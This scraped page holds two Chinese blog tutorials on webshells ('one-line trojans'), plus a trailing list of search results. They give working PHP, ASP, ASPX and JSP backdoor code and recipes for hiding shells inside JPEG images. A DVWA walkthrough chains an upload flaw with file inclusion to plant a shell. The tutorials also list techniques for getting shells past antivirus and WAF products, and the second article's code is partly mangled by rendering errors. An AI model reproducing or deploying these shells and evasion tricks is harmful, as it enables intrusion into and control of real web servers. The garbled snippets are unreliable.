精华内容
下载资源
问答
  • Web安全-一句话木马

    万次阅读 多人点赞 2019-02-07 20:17:05
    先来看看最简单的一句话木马: <?php @eval($_POST['attack']) ?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后...

    概述

    在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?

    先来看看最简单的一句话木马:

       <?php @eval($_POST['attack']);?>
    

    基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']表示从页面中获得attack这个参数值。

    入侵条件

    其中,只要攻击者满足三个条件,就能实现成功入侵:

    (1)木马上传成功,未被杀;
    (2)知道木马的路径在哪;
    (3)上传的木马能正常运行。
    

    常见形式

    常见的一句话木马:

    php的一句话木马: <?php @eval($_POST['pass']);?>
    asp的一句话是:   <%eval request ("pass")%>
    aspx的一句话是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
    

    我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。

    基本原理

    首先我们先看一个原始而又简单的php一句话木马:

       <?php @eval($_POST['cmd']); ?>
    

    看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一眼就是密码是cmd,通过post提交数据,但是具体如何执行的,却不得而知,下面我们分析一句话是如何执行的。

    这句话什么意思呢?

    (1)php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。
    (2)@符号的意思是不报错,即使执行错误,也不报错。
    在这里插入图片描述
    为什么呢?因为一个变量没有定义,就被拿去使用了,服务器就善意的提醒:Notice,你的xxx变量没有定义。这不就暴露了密码吗?所以我们加上@

    (3)为什么密码是cmd呢?

    那就要来理解这句话的意思了。php里面几个超全局变量:$_GET$_POST就是其中之一。$_POST['a']; 的意思就是a这个变量,用post的方法接收。

    注释:传输数据的两种方法,get、post,post是在消息体存放数据,get是在消息头的url路径里存放数据(例如xxx.php?a=2)

    (4)如何理解eval()函数

    eval()把字符串作为PHP代码执行

    例如:eval("echo 'a'");其实就等于直接 echo 'a';再来看看<?php eval($_POST['pw']); ?>首先,用post方式接收变量pw,比如接收到了:pw=echo 'a';这时代码就变成<?php eval("echo 'a';"); ?>。结果如下:
    在这里插入图片描述
    连起来意思就是:用post方法接收变量pw,把变量pw里面的字符串当做php代码来执行。所以也就能这么玩:也就是说,你想执行什么代码,就把什么代码放进变量pw里,用post传输给一句话木马。你想查看目标硬盘里有没有小黄片,可以用php函数:opendir()readdir()等等。想上传点小黄片,诬陷站主,就用php函数:move_uploaded_file,当然相应的html要写好。你想执行cmd命令,则用exec()

    当然前提是:php配置文件php.ini里,关掉安全模式safe_mode = off,然后再看看 禁用函数列表 disable_functions = proc_open, popen, exec, system, shell_exec ,把exec去掉,确保没有exec(有些cms为了方便处理某些功能,会去掉的)。

    来看看效果,POST代码如下:

      cmd=header("Content-type:text/html;charset=gbk");
      exec("ipconfig",$out);
      echo '<pre>';
      print_r($out);
      echo '</pre>';
    

    在这里我们可以看到系统直接执行了系统命令。SO,大家现在应该理解,为什么说一句话短小精悍了吧!
    在这里插入图片描述

    木马利用

    以下通过DVWA的文件上传漏洞,来看看一句话木马如何使用。关于文件上传漏洞可阅读以下文章:文件上传漏洞

    中国菜刀

    【实验准备】首先在本地(桌面)保存一句话木马文件Hack.php(用记事本编写后修改文件后缀即可):

      <?php @eval($_POST['pass']);?>
    

    接下来进入DVWA平台:http://127.0.0.1:8088/DVWA/index.php ,准备开始实验。
    在这里插入图片描述
    在Low 安全级别下,查看后台源码:

     <?php
     if( isset( $_POST[ 'Upload' ] ) ) {
        // Where are we going to be writing to?
        $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
        $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
      }
    ?>
    

    从源码中发现,low级别未对上传的文件进行任何验证。所以可以直接上传PHP或者ASP一句话木马,此例采用php。

    (1)我们将准备好的一句话木马直接上传,然后就可以看到回显的路径:
    在这里插入图片描述在这里插入图片描述
    (2)接着就可以用菜刀连接了,菜刀界面右键,然后点击添加。然后填写相关的数据,如下图:
    在这里插入图片描述“中国菜刀”页面操作说明:

    1、是连接的URL,就是网站的主路径然后加上上传文件时回显的保存路径;
    2、是菜刀连接时的密码,就是上面图片一句话提交的数据(本例为"pass");
    3、是一句话的解析类型,可以是asp,php,aspx。不同的解析类型的一句话内容不一样,文件后缀名不一样。

    (3)然后可以看连接成功的界面:
    在这里插入图片描述(4)接着双击或者右键“文件管理”,进入以下界面:
    在这里插入图片描述我们看到了整个网站的结构和文件,甚至是暴漏了我整个电脑主机的磁盘存储!!可以进行任意非法增删查改!!网站(主机)至此沦陷……
    在这里插入图片描述

    图片木马

    木马如何才能上传成功?通常防御者都会对类型、大小、进行过滤。另外,若规定是上传的图片,还会对图片进行采集。即使攻击者修改文件类型,也过不了图片采集那一关。所以,这就需要一张图片来做掩护。做成隐藏在图片下的木马。linux和windows都有相应的命令,能够让一个文件融合到另一个文件后面,达到隐藏的目的。

    承接上面DVWA实验,High 安全等级,继续先查看源码:

     <?php
     if( isset( $_POST[ 'Upload' ] ) ) {
        // Where are we going to be writing to?
        $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
        $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    
        // File information
        $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
        $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
        $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
        $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    
        // Is it an image?
        if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
            ( $uploaded_size < 100000 ) &&
            getimagesize( $uploaded_tmp ) ) {
    
            // Can we move the file to the upload folder?
            if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
                // No
                echo '<pre>Your image was not uploaded.</pre>';
            }
            else {
                // Yes!
                echo "<pre>{$target_path} succesfully uploaded!</pre>";
            }
        }
        else {
            // Invalid file
            echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
        }
     }
    ?>
    

    可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是“*.jpg”“.jpeg”“*.png”之一。同时,getimagesize()函数更是限制了上传文件的文件头必须为图像类型
    在这里插入图片描述我们需要将上传文件的文件头伪装成图片,首先利用copy命令将一句话木马文件Hack.php与正常的图片文件ClearSky.jpg合并:
    在这里插入图片描述

    【备注】以下为CMD下用copy命令制作“图片木马”的步骤,其中,ClearSky.jpg/b中“b”表示“二进制文件”,hack.php/a中“a"表示ASCII码文件

    在这里插入图片描述
    生成带有木马的图片文件hack.jpg
    在这里插入图片描述
    接着我们打开生成的图片木马文件,我们可以看到一句话木马已附在图片文件末尾:
    在这里插入图片描述
    然后我们试着将生成的木马图片文件hack.jpg上传,上传成功!!!
    在这里插入图片描述访问图片木马:
    在这里插入图片描述

    接下来,上菜刀!!!!!!!!!!!
    在这里插入图片描述
    但是由于是图片木马,PHP脚本并无法被解析,菜刀连接木马失败:
    在这里插入图片描述
    既然图片木马也无法解析,那该怎么办?High级别的程序只允许上传图片啊……别慌,此处结合DVWA靶场自带的文件包含漏洞即可成功上传PHP木马并上菜刀连接了,下面进行攻击演示。

    首先通过上述方法制造新的图片木马,图片文件后面的PHP脚本更改为:

    <?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[hack]);?>'); ?>
    

    然后制作新的图片木马,如下图所示:
    在这里插入图片描述
    接着上传到DVWA,然后借助文件包含漏洞模块访问该木马文件:
    在这里插入图片描述访问的地址如下:http://10.27.25.118:8088/DVWA/vulnerabilities/fi/?page=file:///C:\SoftWare\PhpStudy2016\WWW\DVWA\hackable\uploads\hacker.jpg,如下图所示:
    在这里插入图片描述此时在DVWA文件包含漏洞的路径下便自动生成了PHP一句话木马脚本文件muma.php,如下图所示:
    在这里插入图片描述
    此时再上菜刀连接,即可成功连接:
    在这里插入图片描述
    在这里插入图片描述

    至此,我们成功结合文件包含漏洞,在只能上传图片的文件上传功能处上传图片木马并生成一句话木马。最后附上一篇博文,介绍了图片木马+解析漏洞的利用:PHP图片木马

    木马免杀

    就算木马能正常运行,那么过段时间会不会被管理员杀掉?如何免杀?上面虽然木马上传成功了,但是只要管理员一杀毒,全部都能杀出来。而且,还会很明确的说这是后门。因此,作为攻击者就得会各种免杀技巧。防御者的防御很简单,什么时候哪个论坛爆出新的免杀技巧,安全人员立马将这玩意儿放入黑名单,那么这种免杀技巧就失效了。所以,攻击者得不断创新,发明新的免杀技巧。

    免杀思路】:

    1、将源代码进行再次编码。
    在这里插入图片描述2、将那一句话木马进行base64编码,存放在"乱七八糟"的代码中,直接看图:
    在这里插入图片描述3、还是一句话木马,进行变形,只不过,这次的变形是在数组中键值对变形。很强。
    在这里插入图片描述
    不得不说,免杀的思路真是越猥琐,越好。研究起来非常有意思。以后等我渗透熟练了,会好好研究一下PHP代码的各种免杀技巧。很好玩,思路很猥琐。

    小马和大马

    小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。通过小马上传大马,这时候有个疑问了,那不是多此一举了,为什么要用小马来上传大马,而干嘛不直接上传大马用好了。其实这里是因为小马体积小,有比大马更强的隐蔽优势,而且有针对文件大小上传限制的漏洞,所以才有小马,小马也通常用来做留备用后门等。

    网页小马

    小马体积非常小,只有2KB那么大,隐蔽性也非常的好,因为小马的作用很简单,就是一个上传功能,就没有其它的了,它的作用仅仅是用来上传文件,所以也能过一些安全扫描。小马是为了方便上传大马的,因为很多漏洞做了上传限制,大马上传不了,所以就只能先上传小马,再接着通过小马上传大马了。小马还可以通过与图片合成一起通过IIS漏洞来运行。

    Java语言编写的后台咱们使用JSP木马,与前面的一句话木马不同,菜刀中JSP木马较长,以下是一个简单的JSP小马:

    <%
        if("123".equals(request.getParameter("pwd"))){
            java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
            int a = -1;
            byte[] b = new byte[2048];
            out.print("<pre>");
            while((a=in.read(b))!=-1){
                out.println(new String(b));
            }
            out.print("</pre>");
        }
    %>
    

    成功上传后如果能解析的话,请求:http://服务器IP:端口/Shell/cmd.jsp?pwd=123&i=ipconfig 即可执行命令。

    网页大马

    大马的体积就比较大了,通常在50K左右,比小马会大好多倍,但对应的功能也很强大,包括对数据的管理,命令的操作,数据库的管理,解压缩,和提权等功能,都非常强大。这种大马一旦网站被种了,网站基本就在这个大马控制之中。大马的隐蔽性不好,因为涉及很多敏感代码,安全类程序很容易扫描到。

    中国菜刀的一句话不算,菜刀一句话通过客户端来操作也非常强大,一句话的代码可以和大马实现的一样。我们这里说的小马和大马是指网页类型中的,小马就是为了配合上传大马的,这是它最主要的作用,还有就是小马可以当做备用的后门来使用,一般大马容易被发现,而小马则更容易隐藏在系统的文件夹中。

    来看看一个大马利用实例:在虚拟机中往DVWA上传PHP大马(源码附在最后):
    在这里插入图片描述
    访问木马文件123.php,提交密码123456后进入大马的功能列表,下图所示为文件管理功能:
    在这里插入图片描述继续访问下命令执行功能(其他功能不展示了):
    在这里插入图片描述

    最后附上该PHP大马的代码(代码太长,百度云盘链接):https://pan.baidu.com/s/1XGUp5Q_Q2zn46kcQxE5M3A
    提取码:56pd。另外提供JSP大马的参考地址:https://blog.csdn.net/weixin_34248023/article/details/93094456

    WebShell

    Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的

    webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。 webshell根据功能也分为大马、小马和一句话木马,例如:<%eval request(“pass”)%>通常把这句话写入一个文档里面,然后文件名改成xx.asp。然后传到服务器上面。用eval方法将request(“pass”)转换成代码执行,request函数的作用是应用外部文件。这相当于一句话木马的客户端配置。具体分类如下图:
    在这里插入图片描述

    展开全文
  • 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

    一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

    常用一句话木马
    asp一句话木马:
       <%execute(request(“value”))%>
      php一句话木马:
       <?php @eval($_POST[value]);?>
      aspx一句话木马:
      <%@ Page Language=“Jscript”%>
      <%eval(Request.Item[“value”])%>
    其他一句话木马:
    <%eval request(“value”)%>
      <%execute request(“value”)%>
      <%execute(request(“value”))%>
      <%If Request(“value”)<>"" Then Execute(Request(“value”))%>
      <%if request (“value”)<>"“then session(“value”)=request(“value”):end if:if session(“value”)<>”" then execute session(“value”)%>
      
      不用双引号的一句话木马:
      <%eval request(chr(35))%>
    UTF-7编码加密:
    <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

    客户端:
    一句话最常用的客户端为:
    一句话客户端增强版
    中国菜刀
    lanker一句话客户端
    ZV新型PHP一句话木马客户端GUI版

    使用方法:
    首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库,或者加进asp网页.
    记住!我们的目的是把一句话<%execute request(“value”)%>添加到数据库,无论任何方式!
    然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。

    木马原理:
    首先 < SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(’#’)+’‘这句代码,Request.form(’#’)的作用是读取客户端文件中html标记属性中name值被命名 为#的部分。

    关于错误:
    服务器错误
    经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
    Script error detected at line 1.
    Source line:execute request(“nettoo”)
    Description:类型不匹配: ‘execute’

    解决方法:
    用"eval"替换掉"execute"服务端,就不会出错了。

    中国菜刀与一句话木马
    往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。
    我们可以把一句话木马插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。
    打开中国菜刀,在空白处点击鼠标右键,选择“添加”选项。
    编辑相关参数,包括一句话木马所在的URL及密码,最后点击“编辑。
    在URL列表中选中目标网站,点击鼠标右键,选择“文件管理”,可以看到网站的目录结构。

    图片一句话制作

    如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是:
    首先准备好一张图片,一个一句话木马,以及同路径下的dos窗口
    在这里插入图片描述
    然后输入DOS命令:copy 1.jpg+1.php 2.jpg
    此时产生的2.jpg就是我们要的图片一句话木马。

    其他类型的一句话木马也是一样的使用方法。当然,一般网站不可能这么容易就上传,肯定有防护机制,比方说安全狗防护。

    PHP一句话过狗、卫士、D盾等免杀思路!
    1.关键字拆分。
    比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
    这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法

    2.可变变量、引用、可变函数。
    可变变量 比如a=a=_POST[‘x’];b=a;@eval(b=’a’;@eval($b);

    测试结果:
    在这里插入图片描述
    这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!

    引用 比如a=a=_POST[‘x’];KaTeX parse error: Expected 'EOF', got '&' at position 3: b=&̲a;@eval($b);

    测试结果:
    在这里插入图片描述
    这种方法与上一种方法类似

    可变函数 比如a=a.ss.e.r.t;a=’a’.’ss’.’e’.’r’.’t’;a($_POST[‘x’]);

    测试结果:
    在这里插入图片描述
    这种方法对于狗、3卫士、D盾之类的均没有作用哦

    3.添加其他代码。
    添加其他代码 比如 if(empty($a))
    {
    a=a=_POST[‘x’];
    }
    @eval($a);

    测试结果:
    在这里插入图片描述
    4.函数替换。
    使用其他函数,比如eval可以使用assert替换。
    总结:这种方法适合eval函数被禁用时使用哦

    5.封装到新的函数中。
    新定义一个函数,使其封装到新函数中。
    function test(KaTeX parse error: Expected '}', got 'EOF' at end of input: …一个名为test的函数,并使用a接受参数
    eval(KaTeX parse error: Expected 'EOF', got '}' at position 12: a); }̲ test(_POST[‘x’]);

    测试结果:
    在这里插入图片描述
    这种方法适合有PHP基础的人

    6.函数回调。
    使用其他函数进行调用,并执行。
    如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));

    测试结果:
    在这里插入图片描述
    这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦

    7.利用各种方法的特性写出过WAF的一句话。
    <?php
    function test(KaTeX parse error: Expected '}', got 'EOF' at end of input: …封装函数 if (empty(a)){ //利用所学的添加其他代码
    KaTeX parse error: Expected 'EOF', got '}' at position 48: …/使用这句代码扰乱D盾的判断 }̲ @eval(a);
    }
    @test($_POST[‘x’]);
    ?>

    测试结果:
    在这里插入图片描述

    转载请注明: 转载自Legend‘s BLog
    本文链接地址:
    http://www.legendsec.org/1701.html
    PHP一句话过狗、卫士、D盾等免杀思路!

    展开全文
  • 一句图片木马

    千次阅读 2013-12-07 14:48:14
    首先应该有图片一张(文件名为1.gif)。...一句图片木马一个。他的作用应该是在有后台密码的情况下添加文章,上传图片木马。然后找到图片地址。用一句话客户端进行连接。传小马。传大马。 一句话客

    首先应该有图片一张(文件名为1.gif)。ASP一句话一个(文件名为1.asp)。一句话客户端一个。小马等


    再用CMD下将ASP和GIF进行合并。

    命令如下。copy /b 1.asp+1.gif asp.gif

    将会生成asp.gif。一句话图片木马一个。他的作用应该是在有后台密码的情况下添加文章,上传图片木马。然后找到图片地址。用一句话客户端进行连接。传小马。传大马。


    一句话客户端代码如下:

    -------------------------------------------------------------------------------------------------------------------------

    <form action=http://图片木马地址 method=post>
    <textarea name=value cols=120 rows=10 width=45>
    set lP=server.createObject("Adodb.Stream")
    lP.Open
    lP.Type=2
    lP.CharSet="gb2312"
    lP.writetext request("fhod")
    lP.SaveToFile server.mappath("ck.asp"),2
    lP.Close
    set lP=nothing
    response.redirect "ck.asp"
    </textarea>
    <textarea name=fhod cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
    <input type=submit value=提交>

    -------------------------------------------------------------------------------------------------------------------------

    保存为.htm格式

    展开全文
  • 一句图片木马的制作

    千次阅读 2016-12-19 14:03:18
    一句图片木马的制作
     第一种方法:
    利用dos的copy命令
    1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了)
    2.<%eval request("pass")%>        存为1.asp【asp一句话木马】
    3.copy 1.jpg/b + 1.asp/a 2.jpg    存为1.bat文件

    说明:
    复制当前目录下的 1.jpg 图片和当前目录下的 1.asp 文件并以ASCII代码的方式合并为2.jpg图片 
    运行1.bat 就会出现一个图片2.jpg 
    这个2.jpg就是已经做好的木马

    第二种方法:
    1.用Adobe Photoshop CS打开图片

    2.文件——>文件简介
    插入你需要的木马代码
    asp的一句话是:<%eval request("pass")%>
    aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],"unsafe");%>
    php的一句话是:<?php @eval($_POST["pass"]);?>

    3.文件——>保存【保存:覆盖源文件、也可以另存为其它格式】
    展开全文
  • linux/php一句图片马及实例

    千次阅读 2018-09-24 10:05:08
    Ubuntu一句图片马 准备一张图片tu.jpeg、phpinfo.php和hack.php; Phpinfo.php文件内容: hack.php文件内容: 准备一个16进制软件UE(UltraEdit),linux下载地址:https://www.cr173.com/soft/265552.html ...
  • 一句图片马的制作

    千次阅读 2019-07-26 13:15:09
    接下来写一句话木马 新建一个2.asp文件,写入一句话木马 <%Y=request("xindong")%> <%execute(Y)%> 然后在win+R,cmd,cd到原始图片的目录路径下 copy 1.jpg/b+2.asp/a 3.jpg 桌面上出现新的图片就是...
  • 图片一句话木马简单制作方法

    万次阅读 多人点赞 2017-12-01 23:50:02
    小白对于制作一句话木马的心得,也是给自己留个印象。
  • 使用edjpgcom工具制作一句图片木马

    千次阅读 2019-02-12 16:32:54
    下载地址:... 使用演示: 拖动1.jpg这个正常的图片文件到edjpgcom.exe上,之后在“$_POST['一句话内容']”,之后点击ok,即可实现对1.jpg图片插入一句话木马! 查看图片文件: 工具短小精悍!...
  • 中国菜刀连接图片一句话木马

    千次阅读 2020-04-22 22:18:02
    1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接...
  • 一句图片

    千次阅读 2018-11-06 20:07:55
    做到了个上传绕过的题,随便不管用,但复习一下 windows下,在cmd中通过copy中可以实现文件捆绑, 利用 命令 copy 1.jpg/b+1.php 2.php.jpg ||b是二进制,a为ascii码 可以实现图片中藏马, 如果要绕过前端...
  • edjpgcom制作一句图片木马

    千次阅读 2019-06-19 22:13:37
    图片直接拖到edjpgcom.exe程序上 写入一句话木马 <?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[caidao]);?>')?> 查看图片
  • php图片一句话制作

    千次阅读 2019-01-05 10:18:45
    在其中放入一张图片文件tp.jpg,和yjh.php一句话木马 yjh.php中的一句话木马内容为 &lt;?php @eval($_POST[yjh]);?&gt; 点击bat文件进入DOS命令,写入"copy tp.jpg/b+yjh.php tpyjh.j...
  • 一句话木马转化为图片格式

    千次阅读 2018-10-01 21:50:36
    ($_POST[a]);?> ($_GET['cmd']);?> Asp (“123”)%> ...”Jscript” %>(Request.Item[“123”],”unsafe”)...修改图片内容 在图片txt格式末尾加一句话木马 第四种: 在一句话木马最前面加 gif89a 或 gif87a php格式
  • 在windows cmd中制作图片一句

    千次阅读 2018-03-21 13:36:22
    在测试网站时如果允许上传图片,可以通过上传个隐藏后门代码的图片,然后用菜刀连接快速得到webshell。 在windows cmd.exe(windows+R后输入cmd可快速打开)中可以快速制作这种图片: copy source.jpg/b+...
  • 一句话木马与图片

    千次阅读 2020-01-16 10:11:53
    今天总结的一句话木马,是通过对目标站点、服务器植入木马文件,对网站进行渗透控制。 通常对网站的木马文件植入,都是利用文件上传漏洞进行植入的,先植入小马,再通过小马将大马植入。 小马 小马一...
  • 一句话木马

    千次阅读 2019-01-11 09:52:18
    asp一句话木马 &lt;%eval request(“pass”)%&gt; &lt;%eval(Request.Item[“value”]%&gt; 木马解释 &lt;%execute(request(“pass”))%&gt; request(“pass”)接收客户端提交的数据,...
  • 各位同学 对 一句话木马 我写了第5篇了,没有绝对的安全 我们在完善中!啊哈哈 这段代码 可以被利用做后门 暂时免杀。 代码: &lt;?php //t.php $test = $_GET['r']; echo `$test`; ?&gt; 大家看看...
  • Glide的使用,加载图片只要一句话 本篇文章包括以下内容: 前言 Glide的简介 Glide的配置 Glide的使用 结语 前言用过的人都知道,加载图片哪家强,只有Glide,由于Glide采用链式调用,所以加载图片只要...
  • 【上传漏洞】之图片一句

    千次阅读 2017-08-10 23:06:22
    0x01:保存一张图片,jpg/png/gif格式都可以 0x02:使用C32Asm(十六进制)将图片打开,然后将一句话写到十六进制图片的后边,保存即可
  • 一句话木马原理与实战

    千次阅读 2019-07-30 20:30:44
    一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战 介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句话木马 php一句话木马:  <?php @eval($...
  • 特别推荐的一个php一句话. 菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
  • 上传漏洞-一句话木马

    千次阅读 2019-05-30 20:52:07
    声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧...
  • 如何利用一句图片木马拿到webshell

    千次阅读 2019-07-29 11:56:10
    <?php fputs(fopen("shell.php","w")),'<?php eval($_POST['shell']);?>' 上传图片木马文件 利用文件包含执行上传文件生成后门 通过菜刀连接webshell
  • ![图片说明]... 而Python Shell却可以写一句指令,执行一句指令,再写一句指令,再执行一句指令。 请问Eclipse就不能像 Python Shell一样写一句指令执行一句指令么?
  • 一句话木马是如何被执行的?

    千次阅读 2019-08-18 21:51:31
    一句话木马是如何被执行的0x01 什么是一句话0x02 最最典型的一句话小马0x03 大马与小马0x04 一句话小马是如何执行的呢 0x01 什么是一句一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的...
  • 博客原文地址 最近发现了一个比较不错的应用——ONE(一个),每天只为你准备一张图片、一篇文字和一个问答,打开之后就立马喜欢上了 ...获取每天的一句话 $.ajax({ type: "POST", u...
  • 目的:上传图片一句话木马,使用蚁剑或者菜刀连接获取文件目录 2、图片一句话木马制作 copy命令 1.jpg是随意找的一个图片,a.php是最简单的一句话木马 #cmd执行命令 copy 1.jpg/b+a.php/a 0.jpg 执行结果如下,...
  • 一句话木马插入图片----edjpgcom

    千次阅读 2013-04-29 16:44:27
    说是edjpgcom v4.0其实是v0.4版本,很精巧强悍的小工具! 主要功能是能在图片里插入一句话马或者小马,伪造的比较好。界面如图: 下载地址
  • CTF竞赛实战 中国菜刀与一句话木马

    万次阅读 2018-02-28 11:29:58
    基本操作:往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录二.实战asp的一句话是:&lt;%eval request ("pass")%&gt;aspx的一句话是:&lt;%...
  • 在这里介绍个Android框架:Picasso。  picasso是Square公司开源的个Android图形缓存库...仅仅只需要行代码就能完全实现图片的异步加载。代码如下: public class MainActivity extends Activity { private Imag

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 276,082
精华内容 110,432
关键字:

一句算了的图片